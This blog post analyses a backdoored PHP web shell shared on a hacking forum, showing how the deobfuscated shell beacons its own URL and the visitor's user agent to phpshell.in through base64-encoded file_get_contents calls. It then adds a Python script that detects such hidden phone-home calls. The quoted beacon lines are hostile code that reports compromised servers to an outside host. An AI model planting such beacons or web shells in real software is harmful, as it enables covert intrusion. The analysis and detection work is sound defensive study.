The Risk of the Unknown for the Wannabe

For every wannabe hacker out there, there is a veritable cornucopia of premade tools and utilities that let someone with zero knowledge of anything hit a few buttons and potentially breach a website, and there is a more experienced hacker waiting for the wannabe to pick up an infected or backdoored tool.

@CryptoCypher recently did a rather shameless plug (:P) for a forum he moderates on a discord server I am a member of.

Hey folks. I moderate an InfoSec/hacking forum called GreySec. The community is beginner friendly, and we generally try to hold ourselves to a 'higher standard' as a discussion board.

I decided to check things out, and most of it was 'alright'; however, something caught my eye.

A now-deleted post related to a "Godaddy Secureserver bypass shell" (whatever the hell that is).

The post embedded a bit of PHP code that had been 'obfuscated' (and I use the word obfuscated lightly).

From the PHP code header it is quite plain to see that the code had been obfuscated using FOPO. The obfuscation FOPO applies is pretty straightforward, and there are several online tools that can deobfuscate it.

The deobfuscated sample follows (I'm not posting it inline here in case this site gets flagged for hosting malware...):

https://ghostbin.com/paste/43349

Let's see what is crackin'.

The first several dozen lines look normal for a shell, but this catches my eye:

So what the shell is trying to download is the following: http://phpshell.in/l-127.0.0.1-aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA=. The trailing aHR0cDovLzEyNy4wLjAuMS9zaGVsbC5waHA= is base64 for http://127.0.0.1/shell.php, and since the URL returns nothing (I tried from a DigitalOcean droplet in case phpshell.in didn't like localhost) I'm guessing that function serves solely to log the IP of the server and the location of the shell.

Interesting backdoor: hackers piggybacking on other hackers. However, continue down the code and this crops up between lines 231 and 265: $retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);. Once again, aHR0cDovL3BocHNoZWxsLmluL2wt is base64 for http://phpshell.in/l-.

OK, I'm not going to bother dissecting this function in detail, because it appears to do the same thing as the one above: $lld is 'http://' . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '', i.e. the shell's own URL again. The only difference is that this call also sends the visitor's user agent, $brow = urlencode($_SERVER['HTTP_USER_AGENT']);, for some reason.
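As an added example (my own code, not part of the original post or the shell it discusses): a small Python triage script that pulls the base64 literals out of a PHP file, decodes them, and flags the ones that decode to a URL inside an outbound-request call, plus a helper that decodes a phpshell.in-style beacon seen in egress or proxy logs. The PHP fragment inside it is constructed to mirror the lines quoted above, and the list of fetch functions is my own assumption of what to look for.

```python
import base64
import binascii
import re

# Constructed PHP fragment modelled on the backdoored shell discussed above; not the real sample.
SAMPLE_PHP = r'''<?php
$lld = 'http://' . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . '';
$brow = urlencode($_SERVER['HTTP_USER_AGENT']);
$retValue = file_get_contents(base64_decode("aHR0cDovL3BocHNoZWxsLmluL2wt") . "=" . $lld . base64_decode("JmI=") . "=" . $brow);
echo base64_decode("SGVsbG8=");
'''

# A string literal passed straight to base64_decode(); group 1 keeps the quote style so '...' and "..." both match.
B64_CALL = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
# PHP functions that make outbound requests (assumed list); a decoded URL feeding one of these is the phone-home.
FETCH_FUNCS = ("file_get_contents", "curl_init", "curl_setopt", "fopen", "fsockopen")
URL_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
# Beacon shape seen above: http://phpshell.in/l-<server ip>-<base64 of the shell's own URL>
BEACON_RE = re.compile(r'/l-(\d{1,3}(?:\.\d{1,3}){3})-([A-Za-z0-9+/=]+)$')


def decode_literal(b64):
    """Return the decoded text, or None if the literal is not valid base64 / UTF-8."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_hidden_strings(php_source):
    """Every base64_decode() literal: its line, decoded value, and the fetch call (if any) on that line."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in B64_CALL.finditer(line):
            decoded = decode_literal(m.group(2))
            if decoded is not None:
                findings.append({"line": lineno, "decoded": decoded, "is_url": bool(URL_RE.match(decoded)),
                                 "fetch_call": next((f for f in FETCH_FUNCS if f + "(" in line), None)})
    return findings


def phone_home_hits(php_source):
    """Only the findings that decode to a URL and sit inside an outbound-request call."""
    return [f for f in find_hidden_strings(php_source) if f["is_url"] and f["fetch_call"]]


def decode_beacon(url):
    """Recover (server ip, shell url) from a beacon URL seen in egress/proxy logs, else None."""
    m = BEACON_RE.search(url)
    if not m:
        return None
    decoded = decode_literal(m.group(2))
    return (m.group(1), decoded) if decoded else None
```

Running phone_home_hits over the constructed fragment reports only the file_get_contents line whose literal decodes to http://phpshell.in/l-; the "&b" and "Hello" literals are listed by find_hidden_strings but not flagged.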